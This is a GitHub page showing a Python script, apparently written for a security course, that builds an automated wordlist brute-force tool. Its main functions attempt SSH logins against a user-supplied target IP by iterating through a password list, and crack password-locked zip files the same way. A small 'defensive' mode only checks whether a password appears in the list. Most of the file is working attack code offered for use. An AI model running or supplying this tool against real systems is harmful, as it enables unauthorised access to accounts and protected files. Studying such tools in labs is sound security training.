-
Notifications
You must be signed in to change notification settings - Fork 0
/
rockyoupt3.py
89 lines (73 loc) · 3.65 KB
/
rockyoupt3.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
#!/usr/bin/env python3
# Script Name: Automated Brute Force Wordlist Attack Tool Part 3 of 3
# Author name: Scotty Jokon
# Date of latest revision: 31JAN2024
# Purpose: To create a automated brute force tool
# Execution: python3
# Additional Resources: https://github.com/SteezyLoh/401-OpsChallenge/blob/main/Challenge17.py, https://github.com/Hector2024/ops-401-code-challenges/blob/main/automated_brute_force_tool2.py, https://chat.openai.com/share/c2ff26fa-870d-44b5-a142-f5f0a87857cc
import time
import paramiko
import zipfile
def offensive_mode():
word_list_path = input("Enter the path to the word list file: ")
delay = float(input("Enter the delay between words: "))
target_ip = input("Enter the target SSH server IP address: ")
username = input("Enter the SSH username: ")
# Open the word file and iterate through each line
with open(word_list_path, 'r') as file:
for line in file:
password = line.strip()
# Attempt SSH login with the current password
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(target_ip, username=username, password=password)
print(f"Successful login! Username: {username}, Password: {password}")
break # Break out of the loop if login is successful
except paramiko.AuthenticationException:
print(f"Failed login attempt. Username: {username}, Password: {password}")
finally:
ssh.close()
time.sleep(delay)
def defensive_mode():
user_string = input("Enter a password to search: ")
word_list_path = input("Enter the path to the word list file: ")
with open(word_list_path, 'r') as file:
word_list = [line.strip() for line in file]
if user_string in word_list:
print("The password is in the word list.")
else:
print("The password is not in the word list.")
def zip_bruteforce_mode():
zip_file_path = input("Enter the path to the password-locked zip file: ")
word_list_path = input("Enter the path to the word list file (e.g., RockYou.txt): ")
# Open the word file and iterate through each line
with open(word_list_path, 'r') as file:
for line in file:
password = line.strip()
# Attempt to extract the zip file with the current password
with zipfile.ZipFile(zip_file_path, 'r') as zip_file:
try:
zip_file.extractall(pwd=password.encode('utf-8'))
print(f"Successful extraction! Password: {password}")
break # Break out of the loop if extraction is successful
except Exception as e:
print(f"Failed extraction attempt. Password: {password}, Error: {e}")
time.sleep(0.1) # Small delay between attempts
if __name__ == "__main__":
print("Select mode:")
print("1. Offensive; Dictionary Iterator")
print("2. Defensive; Password Recognized")
print("3. SSH Authentication Attempt")
print("4. Zip File Brute Force")
mode = input("Enter 1 for offensive mode, 2 for defensive mode, 3 for SSH authentication attempt, or 4 for Zip file brute force: ")
if mode == '1':
offensive_mode()
elif mode == '2':
defensive_mode()
elif mode == '3':
offensive_mode() # Reusing the offensive_mode function for SSH authentication
elif mode == '4':
zip_bruteforce_mode()
else:
print("Please enter 1, 2, 3, or 4.")